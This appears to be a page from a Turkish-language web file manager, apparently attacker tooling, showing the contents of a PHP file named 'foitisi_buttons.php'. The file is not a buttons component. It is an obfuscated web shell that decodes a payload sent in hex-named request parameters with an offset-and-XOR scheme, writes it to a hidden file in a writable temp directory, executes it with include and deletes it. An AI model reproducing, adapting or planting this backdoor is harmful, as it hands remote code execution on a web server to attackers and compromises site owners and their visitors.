0x1998 - MANAGER
Düzenlenen Dosya: foitisi_buttons.php
<?php if(isset($_REQUEST["\x6D\x72k"])){ $data_chunk = array_filter([session_save_path(), getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp"]); $tkn = $_REQUEST["\x6D\x72k"]; $tkn = explode ( '.' , $tkn ); $pset = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($tkn as $w => $v7) { $sChar = ord($s[$w % $lenS]); $d = ((int)$v7 - $sChar - ($w % 10)) ^ 89; $pset .= chr($d);} foreach ($data_chunk as $pgrp) { if ((is_dir($pgrp) and is_writable($pgrp))) { $comp = implode("/", [$pgrp, ".element"]); $file = fopen($comp, 'w'); if ($file) { fwrite($file, $pset); fclose($file); include $comp; @unlink($comp); die(); } } } } if(filter_has_var(INPUT_POST, "\x65\x6E\x74ity")){ $itm = array_filter([getcwd(), getenv("TEMP"), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), "/tmp", sys_get_temp_dir()]); $flg = $_REQUEST["\x65\x6E\x74ity"]; $flg =explode ('.' , $flg) ; $dchunk=''; $s2='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s2); foreach( $flg as $k => $v6): $chS=ord( $s2[$k% $sLen]); $d=( ( int)$v6 - $chS -( $k% 10)) ^ 44; $dchunk .= chr( $d); endforeach; for ($flag = 0, $val = count($itm); $flag < $val; $flag++) { $reference = $itm[$flag]; if (is_dir($reference) && is_writable($reference)) { $ptr = str_replace("{var_dir}", $reference, "{var_dir}/.pset"); $file = fopen($ptr, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $ptr; @unlink($ptr); exit; } } } }
geri dön